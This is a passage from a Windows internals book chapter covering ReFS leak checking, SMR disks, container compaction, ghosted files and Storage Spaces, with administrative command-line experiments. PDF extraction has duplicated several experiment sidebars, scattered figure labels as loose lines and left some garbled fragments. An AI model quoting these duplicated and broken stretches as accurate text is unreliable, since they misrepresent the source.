leaks, you can override the setting by using the /x command-line argument. Open an adminis-
trative command prompt and type the following command. (In the example, a 1 TB ReFS volume
was mounted as the E: drive. The /v switch enables the tool’s verbose output.)
C:\>refsutil leak /v e:
Creating volume snapshot on drive \\?\Volume{92aa4440-51de-4566-8c00-bc73e0671b92}...
Creating the scratch file...
Beginning volume scan... This may take a while...
Begin leak verification pass 1 (Cluster leaks)...
End leak verification pass 1. Found 0 leaked clusters on the volume.
Begin leak verification pass 2 (Reference count leaks)...
End leak verification pass 2. Found 0 leaked references on the volume.
Begin leak verification pass 3 (Compacted cluster leaks)...
End leak verification pass 3.
Begin leak verification pass 4 (Remaining cluster leaks)...
End leak verification pass 4. Fixed 0 leaks during this pass.
Finished.
Found leaked clusters: 0
Found reference leaks: 0
Total cluster fixed : 0
Shingled magnetic recording (SMR) volumes
At the time of this writing, one of the biggest problems that classical rotating hard disks are facing is
in regard to the physical limitations inherent to the recording process. To increase disk size, the drive
platter area density must always increase, while, to be able to read and write tiny units of information,
the physical size of the heads of the spinning drives continue to get increasingly smaller. In turn, this
causes the energy barrier for bit flips to decrease, which means that ambient thermal energy is more
likely to accidentally flip flip bits, reducing data integrity. Solid state drives (SSD) have spread to a lot of
consumer systems, large storage servers require more space and at a lower cost, which rotational drives
still provide. Multiple solutions have been designed to overcome the rotating hard-disk problem. The
most effective is called shingled magnetic recording (SMR), which is shown in Figure 11-91. Unlike PMR
(perpendicular magnetic recording), which uses a parallel track layout, the head used for reading the
data in SMR disks is smaller than the one used for writing. The larger writer means it can more effec-
tively magnetize (write) the media without having to compromise readability or stability.
EXPERIMENT: Use Refsutil to find and fix leaks on a ReFS volume
In this experiment, you use the built-in refsutil.exe tool on a ReFS volume to find and fix cluster
leaks that could happen on a ReFS volume. By default, the tool doesn’t require a volume to be
unmounted because it operates on a read-only volume snapshot. To let the tool fix the found
leaks, you can override the setting by using the /x command-line argument. Open an adminis-
trative command prompt and type the following command. (In the example, a 1 TB ReFS volume
was mounted as the E: drive. The /v switch enables the tool’s verbose output.)
C:\>refsutil leak /v e:
Creating volume snapshot on drive \\?\Volume{92aa4440-51de-4566-8c00-bc73e0671b92}...
Creating the scratch file...
Beginning volume scan... This may take a while...
Begin leak verification pass 1 (Cluster leaks)...
End leak verification pass 1. Found 0 leaked clusters on the volume.
Begin leak verification pass 2 (Reference count leaks)...
End leak verification pass 2. Found 0 leaked references on the volume.
Begin leak verification pass 3 (Compacted cluster leaks)...
End leak verification pass 3.
Begin leak verification pass 4 (Remaining cluster leaks)...
End leak verification pass 4. Fixed 0 leaks during this pass.
Finished.
Found leaked clusters: 0
Found reference leaks: 0
Total cluster fixed : 0
CHAPTER 11
Caching and file systems
763
Reader
Writer
Track N
Track N + 1
Track N + 2
Track N + 3
FIGURE 11-91 In SMR disks, the writer track is larger than the reader track.
The new configuration leads to some logical problems. It is almost impossible to write to a disk track
without partially replacing the data on the consecutive track. To solve this problem, SMR disks split the
drive into zones, which are technically called bands. There are two main kinds of zones:
I
Conventional (or fast) zones work like traditional PMR disks, in which random writes are allowed.
I
Write pointer zones are bands that have their own “write pointer” and require strictly sequen-
tial writes. (This is not exactly true, as host-aware SMR disks also support a concept of write
preferred zones, in which random writes are still supported. This kind of zone isn’t used by
ReFS though.)
Each band in an SMR disk is usually 256 MB and works as a basic unit of I/O. This means that the sys-
tem can write in one band without interfering with the next band. There are three types of SMR disks:
I
Drive-managed: The drive appears to the host identical to a nonshingled drive. The host
does not need to follow any special protocol, as all handling of data and the existence of the
disk zones and sequential write constraints is managed by the device’s firmware. This type of
SMR disk is great for compatibility but has some limitations–the disk cache used to transform
random writes in sequential ones is limited, band cleaning is complex, and sequential write
detection is not trivial. These limitations hamper performance.
I
Host-managed: The device requires strict adherence to special I/O rules by the host. The host
is required to write sequentially as to not destroy existing data. The drive refuses to execute
commands that violate this assumption. Host-managed drives support only sequential write
zones and conventional zones, where the latter could be any media including non-SMR, drive-
managed SMR, and flash.
I
Host-aware: A combination of drive-managed and host-managed, the drive can manage the
shingled nature of the storage and will execute any command the host gives it, regardless of
whether it’s sequential. However, the host is aware that the drive is shingled and is able to query
the drive for getting SMR zone information. This allows the host to optimize writes for the
shingled nature while also allowing the drive to be flexible and backward-compatible. Host-
aware drives support the concept of sequential write preferred zones.
At the time of this writing, ReFS is the only file system that can support host-managed SMR disks
natively. The strategy used by ReFS for supporting these kinds of drives, which can achieve very large
capacities (20 terabytes or more), is the same as the one used for tiered volumes, usually generated by
Storage Spaces (see the final section for more information about Storage Spaces).
764
CHAPTER 11
Caching and file systems
ReFS support for tiered volumes and SMR
Tiered volumes are similar to host-aware SMR disks. They’re composed of a fast, random access area
(usually provided by a SSD) and a slower sequential write area. This isn’t a requirement, though; tiered
disks can be composed by different random-access disks, even of the same speed. ReFS is able to
properly manage tiered volumes (and SMR disks) by providing a new logical indirect layer between files
and directory namespace on the top of the volume namespace. This new layer divides the volume into
logical containers, which do not overlap (so a given cluster is present in only one container at time). A
container represents an area in the volume and all containers on a volume are always of the same size,
which is defined based on the type of the underlying disk: 64 MB for standard tiered disks and 256 MB
for SMR disks. Containers are called ReFS bands because if they’re used with SMR disks, the containers’
size becomes exactly the same as the SMR bands’ size, and each container maps one-to-one to each
SMR band.
The indirection layer is configured and provided by the global container table, as shown in Figure 11-92.
The rows of this table are composed by keys that store the ID and the type of the container. Based on
the type of container (which could also be a compacted or compressed container), the row’s data is
different. For noncompacted containers (details about ReFS compaction are available in the next sec-
tion), the row’s data is a data structure that contains the mapping of the cluster range addressed by the
container. This provides to ReFS a virtual LCN-to-real LCN namespace mapping.
File’s extent table
B+ tree
Bands divided
into clusters
{ID: 194 Type: Base }
{ID: 195 Type: Base }
{ID: 196 Type: Base }
{ID: 197 Type: Base }
RLCN 0x12E400
RLCN 0x12E800
RLCN 0x12F000
RLCN 0x12EC00
Virtual LCN namespace
Real LCN namespace
KEY
VALUE
Container table
FIGURE 11-92 The container table provides a virtual LCN-to-real LCN indirection layer.
The container table is important: all the data managed by ReFS and Minstore needs to pass through
the container table (with only small exceptions), so ReFS maintains multiple copies of this vital table.
To perform an I/O on a block, ReFS must first look up the location of the extent’s container to find the
CHAPTER 11
Caching and file systems
765
real location of the data. This is achieved through the extent table, which contains target virtual LCN
of the cluster range in the data section of its rows. The container ID is derived from the LCN, through a
mathematical relationship. The new level of indirection allows ReFS to move the location of containers
without consulting or modifying the file extent tables.
ReFS consumes tiers produced by Storage Spaces, hardware tiered volumes, and SMR disks. ReFS
redirects small random I/Os to a portion of the faster tiers and destages those writes in batches to the
slower tiers using sequential writes (destages happen at container granularity). Indeed, in ReFS, the
term fast tier (or ash tier) refers to the random-access zone, which might be provided by the conven-
tional bands of an SMR disk, or by the totality of an SSD or NVMe device. The term slow tier (or HDD
tier) refers instead to the sequential write bands or to a rotating disk. ReFS uses different behaviors
based on the class of the underlying medium. Non-SMR disks have no sequential requirements, so
clusters can be allocated from anywhere on the volume; SMR disks, as discussed previously, need to
have strictly sequential requirements, so ReFS never writes random data on the slow tier.
By default, all of the metadata that ReFS uses needs to stay in the fast tier; ReFS tries to use the
fast tier even when processing general write requests. In non-SMR disks, as flash containers fill, ReFS
moves containers from flash to HDD (this means that in a continuous write workload, ReFS is continu-
ally moving containers from flash into HDD). ReFS is also able to do the opposite when needed—select
containers from the HDD and move them into flash to fill with subsequent writes. This feature is called
container rotation and is implemented in two stages. After the storage driver has copied the actual
data, ReFS modifies the container LCN mapping shown earlier. No modification in any file’s extent
table is needed.
Container rotation is implemented only for non-SMR disks. This is important, because in SMR
disks, the ReFS file system driver never automatically moves data between tiers. Applications that are
SMR disk–aware and want to write data in the SMR capacity tier can use the FSCTL_SET_REFS_FILE_
STRICTLY_SEQUENTIAL control code. If an application sends the control code on a file handle, the ReFS
driver writes all of the new data in the capacity tier of the volume.
EXPERIMENT: Witnessing SMR disk tiers
You can use the FsUtil tool, which is provided by Windows, to query the information of an SMR
disk, like the size of each tier, the usable and free space, and so on. To do so, just run the tool in
an administrative command prompt. You can launch the command prompt as administrator by
searching for cmd in the Cortana Search box and by selecting Run As Administrator after right-
clicking the Command Prompt label. Input the following parameters:
fsutil volume smrInfo <VolumeDrive>
replacing the VolumeDrive part with the drive letter of your SMR disk.
EXPERIMENT: Witnessing SMR disk tiers
You can use the FsUtil tool, which is provided by Windows, to query the information of an SMR
disk, like the size of each tier, the usable and free space, and so on. To do so, just run the tool in
an administrative command prompt. You can launch the command prompt as administrator by
searching for cmd in the Cortana Search box and by selecting Run As Administrator after right-
clicking the Command Prompt label. Input the following parameters:
fsutil volume smrInfo <VolumeDrive>
replacing the VolumeDrive part with the drive letter of your SMR disk.
766
CHAPTER 11
Caching and file systems
Furthermore, you can start a garbage collection (see the next paragraph for details about this
feature) through the following command:
fsutil volume smrGc <VolumeDrive> Action=startfullspeed
The garbage collection can even be stopped or paused through the relative Action param-
eter. You can start a more precise garbage collection by specifying the IoGranularity parameter,
which specifies the granularity of the garbage collection I/O, and using the start action instead
of startfullspeed.
Container compaction
Container rotation has performance problems, especially when storing small files that don’t usually
fit into an entire band. Furthermore, in SMR disks, container rotation is never executed, as we ex-
plained earlier. Recall that each SMR band has an associated write pointer (hardware implemented),
which identifies the location for sequential writing. If the system were to write before or after the write
pointer in a non-sequential way, it would corrupt data located in other clusters (the SMR firmware must
therefore refuse such a write).
ReFS supports two types of containers: base containers, which map a virtual cluster’s range directly
to physical space, and compacted containers, which map a virtual container to many different base
containers. To correctly map the correspondence between the space mapped by a compacted contain-
er and the base containers that compose it, ReFS implements an allocation bitmap, which is stored in
the rows of the global container index table (another table, in which every row describes a single com-
pacted container). The bitmap has a bit set to 1 if the relative cluster is allocated; otherwise, it’s set to 0.
Figure 11-93 shows an example of a base container (C32) that maps a range of virtual LCNs (0x8000
to 0x8400) to real volume’s LCNs (0xB800 to 0xBC00, identified by R46). As previously discussed, the
container ID of a given virtual LCN range is derived from the starting virtual cluster number; all the
Furthermore, you can start a garbage collection (see the next paragraph for details about this
feature) through the following command:
fsutil volume smrGc <VolumeDrive> Action=startfullspeed
The garbage collection can even be stopped or paused through the relative Action param-
eter. You can start a more precise garbage collection by specifying the IoGranularity parameter,
IoGranularity parameter,
IoGranularity
which specifies the granularity of the garbage collection I/O, and using the start action instead
start action instead
start
of startfullspeed.
CHAPTER 11
Caching and file systems
767
containers are virtually contiguous. In this way, ReFS never needs to look up a container ID for a given
container range. Container C32 of Figure 11-93 only has 560 clusters (0x230) contiguously allocated
(out of its 1,024). Only the free space at the end of the base container can be used by ReFS. Or, for
non-SMR disks, in case a big chunk of space located in the middle of the base container is freed, it
can be reused too. Even for non-SMR disks, the important requirement here is that the space must
be contiguous.
If the container becomes fragmented (because some small file extents are eventually freed), ReFS
can convert the base container into a compacted container. This operation allows ReFS to reuse the
container’s free space, without reallocating any row in the extent table of the files that are using the
clusters described by the container itself.
Cluster size: 64KB
Volume size: 1TB (0x1000000 clusters)
Container table entry:
Key –> (ID: 32, Type: Base)
Value –> Allocated size: 0x230 clusters
Real LCNs: [0xB800 - 0xBC00]
0x8000
0x8400
0xB800
R46
C32
0xBC00
Base Container C32
VCN RANGE
[0 - 0x400]
[0x400 - 0x800]
[0x800 - 0xA00]
[0xA00 - 0xC00]
[0xC00 - 0xD20]
LCN
0x18400
0x32000
0x61E00
0x11200
0x8110
CONTAINER ID
97
200
391
68
32
EXTENT TABLE
0
64MB
128MB
192MB
210MB
Container size: 64MB (0x400 clusters)
FIGURE 11-93 An example of a base container addressed by a 210 MB file. Container C32 uses only 35 MB of its
64 MB space.
ReFS provides a way to defragment containers that are fragmented. During normal system I/O
activity, there are a lot of small files or chunks of data that need to be updated or created. As a result,
containers located in the slow tier can hold small chunks of freed clusters and can become quickly
fragmented. Container compaction is the name of the feature that generates new empty bands in the
slow tier, allowing containers to be properly defragmented. Container compaction is executed only in
the capacity tier of a tiered volume and has been designed with two different goals:
768
CHAPTER 11
Caching and file systems
I
Compaction is the garbage collector for SMR-disks: In SMR, ReFS can only write data in the
capacity zone in a sequential manner. Small data can’t be singularly updated in a container lo-
cated in the slow tier. The data doesn’t reside at the location pointed by the SMR write pointer,
so any I/O of this kind can potentially corrupt other data that belongs to the band. In that case,
the data is copied in a new band. Non-SMR disks don’t have this problem; ReFS updates data
residing in the small tier directly.
I
In non-SMR tiered volumes, compaction is the generator for container rotation: The
generated free containers can be used as targets for forward rotation when data is moved from
the fast tier to the slow tier.
ReFS, at volume-format time, allocates some base containers from the capacity tier just for com-
paction; which are called compacted reserved containers. Compaction works by initially searching for
fragmented containers in the slow tier. ReFS reads the fragmented container in system memory and
defragments it. The defragmented data is then stored in a compacted reserved container, located in
the capacity tier, as described above. The original container, which is addressed by the file extent table,
becomes compacted. The range that describes it becomes virtual (compaction adds another indirec-
tion layer), pointing to virtual LCNs described by another base container (the reserved container). At
the end of the compaction, the original physical container is marked as freed and is reused for different
purposes. It also can become a new compacted reserved container. Because containers located in the
slow tier usually become highly fragmented in a relatively small time, compaction can generate a lot of
empty bands in the slow tier.
The clusters allocated by a compacted container can be stored in different base containers. To prop-
erly manage such clusters in a compacted container, which can be stored in different base containers,
ReFS uses another extra layer of indirection, which is provided by the global container index table and
by a different layout of the compacted container. Figure 11-94 shows the same container as Figure
11-93, which has been compacted because it was fragmented (272 of its 560 clusters have been freed).
In the container table, the row that describes a compacted container stores the mapping between the
cluster range described by the compacted container, and the virtual clusters described by the base
containers. Compacted containers support a maximum of four different ranges (called legs). The four
legs create the second indirection layer and allow ReFS to perform the container defragmentation in an
efficient way. The allocation bitmap of the compacted container provides the second indirection layer,
too. By checking the position of the allocated clusters (which correspond to a 1 in the bitmap), ReFS is
able to correctly map each fragmented cluster of a compacted container.
In the example in Figure 11-94, the first bit set to 1 is at position 17, which is 0x11 in hexadecimal. In
the example, one bit corresponds to 16 clusters; in the actual implementation, though, one bit corre-
sponds to one cluster only. This means that the first cluster allocated at offset 0x110 in the compacted
container C32 is stored at the virtual cluster 0x1F2E0 in the base container C124. The free space avail-
able after the cluster at offset 0x230 in the compacted container C32, is mapped into base container
C56. The physical container R46 has been remapped by ReFS and has become an empty compacted
reserved container, mapped by the base container C180.
CHAPTER 11
Caching and file systems
769
0x8000
0x8400
C32
0x1F000
0x1F400
C124
C56
0x32400
0x32800
R201
R11
C124 Container table entry:
Key –> (ID: 124, Type: Base)
Value –> Allocated size: 0x400 clusters
Real LCNs: [0x32400 - 0x32800]
Compacted Container C32
C56 Container table entry:
Key –> (ID: 56, Type: Base)
Value –> Allocated size: 0x2F0 clusters
Real LCNs: [0x2C00 - 0x3000]
C32 Container Index table entry:
Key –> (ID: 32, Type: Compacted)
Value –> Index Allocation Bitmap (1 bit = 16 clusters)
0000000000000000 0111111111111000 00000…
C32 Container table entry:
Key –> (ID: 32, Type: Compacted)
Value –> 2 Legs
1. Virtual LCNs: [0x1F2E0 - 0x1F400]
2. Virtual LCNs: [0x1C400 - 0x1C6F0]
0x1C400
0x1C800
0x2C00
0x3000
0x2D000
0x2D400
C180
0xB800
0xBC00
R46
FIGURE 11-94 Container C32 has been compacted in base container C124 and C56.
In SMR disks, the process that starts the compaction is called garbage collection. For SMR disks, an
application can decide to manually start, stop, or pause the garbage collection at any time through the
FSCTL_SET_REFS_SMR_VOLUME_GC_PARAMETERS file system control code.
In contrast to NTFS, on non-SMR disks, the ReFS volume analysis engine can automatically start the
container compaction process. ReFS keeps track of the free space of both the slow and fast tier and the
available writable free space of the slow tier. If the difference between the free space and the available
space exceeds a threshold, the volume analysis engine kicks off and starts the compaction process.
Furthermore, if the underlying storage is provided by Storage Spaces, the container compaction runs
periodically and is executed by a dedicated thread.
Compression and ghosting
ReFS does not support native file system compression, but, on tiered volumes, the file system is able to
save more free containers on the slow tier thanks to container compression. Every time ReFS performs
container compaction, it reads in memory the original data located in the fragmented base container.
At this stage, if compression is enabled, ReFS compresses the data and finally writes it in a compressed
compacted container. ReFS supports four different compression algorithms: LZNT1, LZX, XPRESS, and
XPRESS_HUFF.
Many hierarchical storage management (HMR) software solutions support the concept of a ghosted
file. This state can be obtained for many different reasons. For example, when the HSM migrates the
user file (or some chunks of it) to a cloud service, and the user later modifies the copy located in the
cloud through a different device, the HSM filter driver needs to keep track of which part of the file
changed and needs to set the ghosted state on each modified file’s range. Usually HMRs keep track
of the ghosted state through their filter drivers. In ReFS, this isn’t needed because the ReFS file system
exposes a new I/O control code, FSCTL_GHOST_FILE_EXTENTS. Filter drivers can send the IOCTL to the
ReFS driver to set part of the file as ghosted. Furthermore, they can query the file’s ranges that are in
the ghosted state through another I/O control code: FSCTL_QUERY_GHOSTED_FILE_EXTENTS.
770
CHAPTER 11
Caching and file systems
ReFS implements ghosted files by storing the new state information directly in the file’s extent
table, which is implemented through an embedded table in the file record, as explained in the previ-
ous section. A filter driver can set the ghosted state for every range of the file (which must be cluster-
aligned). When the ReFS driver intercepts a read request for an extent that is ghosted, it returns a
STATUS_GHOSTED error code to the caller, which a filter driver can then intercept and redirect the read
to the proper place (the cloud in the previous example).
Storage Spaces
Storage Spaces is the technology that replaces dynamic disks and provides virtualization of physical stor-
age hardware. It has been initially designed for large storage servers but is available even in client editions
of Windows 10. Storage Spaces also allows the user to create virtual disks composed of different underly-
ing physical mediums. These mediums can have different performance characteristics.
At the time of this writing, Storage Spaces is able to work with four types of storage devices:
Nonvolatile memory express (NVMe), flash disks, persistent memory (PM), SATA and SAS solid state
drives (SSD), and classical rotating hard-disks (HDD). NVMe is considered the faster, and HDD is the
slowest. Storage spaces was designed with four goals:
I
Performance: Spaces implements support for a built-in server-side cache to maximize storage
performance and support for tiered disks and RAID 0 configuration.
I
Reliability: Other than span volumes (RAID 0), spaces supports Mirror (RAID 1 and 10) and
Parity (RAID 5, 6, 50, 60) configurations when data is distributed through different physical disks
or different nodes of the cluster.
I
Flexibility: Storage spaces allows the system to create virtual disks that can be automatically
moved between a cluster’s nodes and that can be automatically shrunk or extended based on
real space consumption.
I
Availability: Storage spaces volumes have built-in fault tolerance. This means that if a drive, or
even an entire server that is part of the cluster, fails, spaces can redirect the I/O traffic to other
working nodes without any user intervention (and in a way). Storage spaces don’t have a single
point of failure.
Storage Spaces Direct is the evolution of the Storage Spaces technology. Storage Spaces Direct is
designed for large datacenters, where multiple servers, which contain different slow and fast disks, are
used together to create a pool. The previous technology didn’t support clusters of servers that weren’t
attached to JBOD disk arrays; therefore, the term direct was added to the name. All servers are con-
nected through a fast Ethernet connection (10GBe or 40GBe, for example). Presenting remote disks
as local to the system is made possible by two drivers—the cluster miniport driver (Clusport.sys) and
the cluster block filter driver (Clusbflt.sys)—which are outside the scope of this chapter. All the storage
physical units (local and remote disks) are added to a storage pool, which is the main unit of manage-
ment, aggregation, and isolation, from where virtual disks can be created.
The entire storage cluster is mapped internally by Spaces using an XML file called BluePrint. The file
is automatically generated by the Spaces GUI and describes the entire cluster using a tree of different
CHAPTER 11
Caching and file systems
771
storage entities: Racks, Chassis, Machines, JBODs (Just a Bunch of Disks), and Disks. These entities com-
pose each layer of the entire cluster. A server (machine) can be connected to different JBODs or have
different disks directly attached to it. In this case, a JBOD is abstracted and represented only by one
entity. In the same way, multiple machines might be located on a single chassis, which could be part
of a server rack. Finally, the cluster could be made up of multiple server racks. By using the Blueprint
representation, Spaces is able to work with all the cluster disks and redirect I/O traffic to the correct
replacement in case a fault on a disk, JBOD, or machine occurs. Spaces Direct can tolerate a maximum
of two contemporary faults.
Spaces internal architecture
One of the biggest differences between Spaces and dynamic disks is that Spaces creates virtual disk
objects, which are presented to the system as actual disk device objects by the Spaces storage driver
(Spaceport.sys). Dynamic disks operate at a higher level: virtual volume objects are exposed to the
system (meaning that user mode applications can still access the original disks). The volume manager
is the component responsible for creating the single volume composed of multiple dynamic volumes.
The Storage Spaces driver is a filter driver (a full filter driver rather than a minifilter) that lies between
the partition manager (Partmgr.sys) and the disk class driver.
Storage Spaces architecture is shown in Figure 11-95 and is composed mainly of two parts: a
platform-independent library, which implements the Spaces core, and an environment part, which
is platform-dependent and links the Spaces core to the current environment. The Environment layer
provides to Storage Spaces the basic core functionalities that are implemented in different ways based
on the platform on which they run (because storage spaces can be used as bootable entities, the
Windows boot loader and boot manager need to know how to parse storage spaces, hence the need
for both a UEFI and Windows implementation). The core basic functionality includes memory manage-
ment routines (alloc, free, lock, unlock and so on), device I/O routines (Control, Pnp, Read, and Write),
and synchronization methods. These functions are generally wrappers to specific system routines. For
example, the read service, on Windows platforms, is implemented by creating an IRP of type IRP_MJ_
READ and by sending it to the correct disk driver, while, on UEFI environments, its implemented by
using the BLOCK_IO_PROTOCOL.
Spaceport.sys
Storage Spaces
Core Library
Core
Store
Metadata
I/O
Memory management
Device I/O
Synchronization
Storage
Spaces
Environment
part
FIGURE 11-95 Storage Spaces architecture.
772
CHAPTER 11
Caching and file systems
Other than the boot and Windows kernel implementation, storage spaces must also be available
during crash dumps, which is provided by the Spacedump.sys crash dump filter driver. Storage Spaces is
even available as a user-mode library (Backspace.dll), which is compatible with legacy Windows operat-
ing systems that need to operate with virtual disks created by Spaces (especially the VHD file), and even
as a UEFI DXE driver (HyperSpace.efi), which can be executed by the UEFI BIOS, in cases where even the
EFI System Partition itself is present on a storage space entity. Some new Surface devices are sold with a
large solid-state disk that is actually composed of two or more fast NVMe disks.
Spaces Core is implemented as a static library, which is platform-independent and is imported by
all of the different environment layers. Is it composed of four layers: Core, Store, Metadata, and IO.
The Core is the highest layer and implements all the services that Spaces provides. Store is the com-
ponent that reads and writes records that belong to the cluster database (created from the BluePrint
file). Metadata interprets the binary records read by the Store and exposes the entire cluster database
through different objects: Pool Drive Space Extent Column Tier and Metadata. The IO component,
which is the lowest layer, can emit I/Os to the correct device in the cluster in the proper sequential way,
thanks to data parsed by higher layers.
Services provided by Spaces
Storage Spaces supports different disk type configurations. With Spaces, the user can create virtual
disks composed entirely of fast disks (SSD, NVMe, and PM), slow disks, or even composed of all four
supported disk types (hybrid configuration). In case of hybrid deployments, where a mix of different
classes of devices are used, Spaces supports two features that allow the cluster to be fast and efficient:
I
Server cache: Storage Spaces is able to hide a fast drive from the cluster and use it as a cache for
the slower drives. Spaces supports PM disks to be used as a cache for NVMe or SSD disks, NVMe
disks to be used as cache for SSD disks, and SSD disks to be used as cache for classical rotating
HDD disks. Unlike tiered disks, the cache is invisible to the file system that resides on the top of
the virtual volume. This means that the cache has no idea whether a file has been accessed more
recently than another file. Spaces implements a fast cache for the virtual disk by using a log that
keeps track of hot and cold blocks. Hot blocks represent parts of files (files’ extents) that are often
accessed by the system, whereas cold blocks represent part of files that are barely accessed. The
log implements the cache as a queue, in which the hot blocks are always at the head, and cold
blocks are at the tail. In this way, cold blocks can be deleted from the cache if it’s full and can be
maintained only on the slower storage; hot blocks usually stay in the cache for a longer time.
I
Tiering: Spaces can create tiered disks, which are managed by ReFS and NTFS. Whereas ReFS sup-
ports SMR disks, NTFS only supports tiered disks provided by Spaces. The file system keeps track of
the hot and cold blocks and rotates the bands based on the file’s usage (see the “ReFS support
for tiered volumes and SMR” section earlier in this chapter). Spaces provides to the file system
driver support for pinning, a feature that can pin a file to the fast tier and lock it in the tier until
it will be unpinned. In this case, no band rotation is ever executed. Windows uses the pinning
feature to store the new files on the fast tier while performing an OS upgrade.
As already discussed previously, one of the main goals of Storage Spaces is flexibility. Spaces
supports the creation of virtual disks that are extensible and consume only allocated space in the
CHAPTER 11
Caching and file systems
773
underlying cluster’s devices; this kind of virtual disk is called thin provisioned. Unlike fixed provisioned
disks, where all of the space is allocated to the underlying storage cluster, thin provisioned disks al-
locate only the space that is actually used. In this way, it’s possible to create virtual disks that are much
larger than the underlying storage cluster. When available space gets low, a system administrator can
dynamically add disks to the cluster. Storage Spaces automatically includes the new physical disks to
the pool and redistributes the allocated blocks between the new disks.
Storage Spaces supports thin provisioned disks through slabs. A slab is a unit of allocation, which is
similar to the ReFS container concept, but applied to a lower-level stack: the slab is an allocation unit of
a virtual disk and not a file system concept. By default, each slab is 256 MB in size, but it can be bigger
in case the underlying storage cluster allows it (i.e., if the cluster has a lot of available space.) Spaces
core keeps track of each slab in the virtual disk and can dynamically allocate or free slabs by using its
own allocator. It’s worth noting that each slab is a point of reliability: in mirrored and parity configura-
tions, the data stored in a slab is automatically replicated through the entire cluster.
When a thin provisioned disk is created, a size still needs to be specified. The virtual disk size will be
used by the file system with the goal of correctly formatting the new volume and creating the needed
metadata. When the volume is ready, Spaces allocates slabs only when new data is actually written to
the disk—a method called allocate-on-write. Note that the provisioning type is not visible to the file
system that resides on top of the volume, so the file system has no idea whether the underlying disk is
thin or fixed provisioned.
Spaces gets rid of any single point of failure by making usage of mirroring and pairing. In big stor-
age clusters composed of multiple disks, RAID 6 is usually employed as the parity solution. RAID 6 al-
lows the failure of a maximum of two underlying devices and supports seamless reconstruction of data
without any user intervention. Unfortunately, when the cluster encounters a single (or double) point of
failure, the time needed to reconstruct the array (mean time to repair or MTTR) is high and often causes
serious performance penalties.
Spaces solves the problem by using a local reconstruction code (LCR) algorithm, which reduces the
number of reads needed to reconstruct a big disk array, at the cost of one additional parity unit. As
shown in Figure 11-96, the LRC algorithm does so by dividing the disk array in different rows and by
adding a parity unit for each row. If a disk fails, only the other disks of the row needs to be read. As a
result, reconstruction of a failed array is much faster and more efficient.
LRC
RAID 6
D
0
D
2
D
4
P
0
P
1
P
2
D
1
D
3
D
5
D
0
D
1
D
2
D
3
D
4
D
5
P
0
P
1
FIGURE 11-96 RAID 6 and LRC parity.
Figure 11-96 shows a comparison between the typical RAID 6 parity implementation and the LRC
implementation on a cluster composed of eight drives. In the RAID 6 configuration, if one (or two)
disk(s) fail(s), to properly reconstruct the missing information, the other six disks need to be read; in
LRC, only the disks that belong to the same row of the failing disk need to be read.
774
CHAPTER 11
Caching and file systems
EXPERIMENT: Creating tiered volumes
Storage Spaces is supported natively by both server and client editions of Windows 10. You can
create tiered disks using the graphical user interface, or you can also use Windows PowerShell.
In this experiment, you will create a virtual tiered disk, and you will need a workstation that,
other than the Windows boot disk, also has an empty SSD and an empty classical rotating disk
(HDD). For testing purposes, you can emulate a similar configuration by using HyperV. In that
case, one virtual disk file should reside on an SSD, whereas the other should reside on a classical
rotating disk.
First, you need to open an administrative Windows PowerShell by right-clicking the Start
menu icon and selecting Windows PowerShell (Admin). Verify that the system has already iden-
tified the type of the installed disks:
PS C:\> Get-PhysicalDisk | FT DeviceId, FriendlyName, UniqueID, Size, MediaType, CanPool
DeviceId FriendlyName
UniqueID
Size MediaType CanPool
-------- ------------
--------
---- --------- -------
2
Samsung SSD 960 EVO 1TB eui.0025385C61B074F7 1000204886016 SSD
False
0
Micron 1100 SATA 512GB 500A071516EBA521
512110190592 SSD
True
1
TOSHIBA DT01ACA200
500003F9E5D69494 2000398934016 HDD
True
In the preceding example, the system has already identified two SSDs and one classical
rotating hard disk. You should verify that your empty disks have the CanPool value set to True.
Otherwise, it means that the disk contains valid partitions that need to be deleted. If you’re test-
ing a virtualized environment, often the system is not able to correctly identify the media type of
the underlying disk.
PS C:\> Get-PhysicalDisk | FT DeviceId, FriendlyName, UniqueID, Size, MediaType, CanPool
DeviceId FriendlyName
UniqueID
Size MediaType CanPool
-------- ------------
--------
---- --------- -------
2
Msft Virtual Disk 600224802F4EE1E6B94595687DDE774B 137438953472 Unspecified True
1
Msft Virtual Disk 60022480170766A9A808A30797285D77 1099511627776 Unspecified True
0
Msft Virtual Disk 6002248048976A586FE149B00A43FC73 274877906944 Unspecified False
In this case, you should manually specify the type of disk by using the command
Set-PhysicalDisk -UniqueId (Get-PhysicalDisk)[<IDX>].UniqueID -MediaType <Type>,
where IDX is the row number in the previous output and MediaType is SSD or HDD, depending
on the disk type. For example:
PS C:\> Set-PhysicalDisk -UniqueId (Get-PhysicalDisk)[0].UniqueID -MediaType SSD
PS C:\> Set-PhysicalDisk -UniqueId (Get-PhysicalDisk)[1].UniqueID -MediaType HDD
PS C:\> Get-PhysicalDisk | FT DeviceId, FriendlyName, UniqueID, Size, MediaType, CanPool
DeviceId FriendlyName
UniqueID
Size MediaType CanPool
-------- ------------
--------
---- --------- -------
2
Msft Virtual Disk 600224802F4EE1E6B94595687DDE774B 137438953472 SSD
True
1
Msft Virtual Disk 60022480170766A9A808A30797285D77 1099511627776 HDD
True
0
Msft Virtual Disk 6002248048976A586FE149B00A43FC73 274877906944 Unspecified False
EXPERIMENT: Creating tiered volumes
Storage Spaces is supported natively by both server and client editions of Windows 10. You can
create tiered disks using the graphical user interface, or you can also use Windows PowerShell.
In this experiment, you will create a virtual tiered disk, and you will need a workstation that,
other than the Windows boot disk, also has an empty SSD and an empty classical rotating disk
(HDD). For testing purposes, you can emulate a similar configuration by using HyperV. In that
case, one virtual disk file should reside on an SSD, whereas the other should reside on a classical
rotating disk.
First, you need to open an administrative Windows PowerShell by right-clicking the Start
menu icon and selecting Windows PowerShell (Admin). Verify that the system has already iden-
tified the type of the installed disks:
PS C:\> Get-PhysicalDisk | FT DeviceId, FriendlyName, UniqueID, Size, MediaType, CanPool
DeviceId FriendlyName
UniqueID
Size MediaType CanPool
-------- ------------
--------
---- --------- -------
2
Samsung SSD 960 EVO 1TB eui.0025385C61B074F7 1000204886016 SSD
False
0
Micron 1100 SATA 512GB 500A071516EBA521
512110190592 SSD
True
1
TOSHIBA DT01ACA200
500003F9E5D69494 2000398934016 HDD
True
In the preceding example, the system has already identified two SSDs and one classical
rotating hard disk. You should verify that your empty disks have the CanPool value set to
CanPool value set to
CanPool
True.
Otherwise, it means that the disk contains valid partitions that need to be deleted. If you’re test-
ing a virtualized environment, often the system is not able to correctly identify the media type of
the underlying disk.
PS C:\> Get-PhysicalDisk | FT DeviceId, FriendlyName, UniqueID, Size, MediaType, CanPool
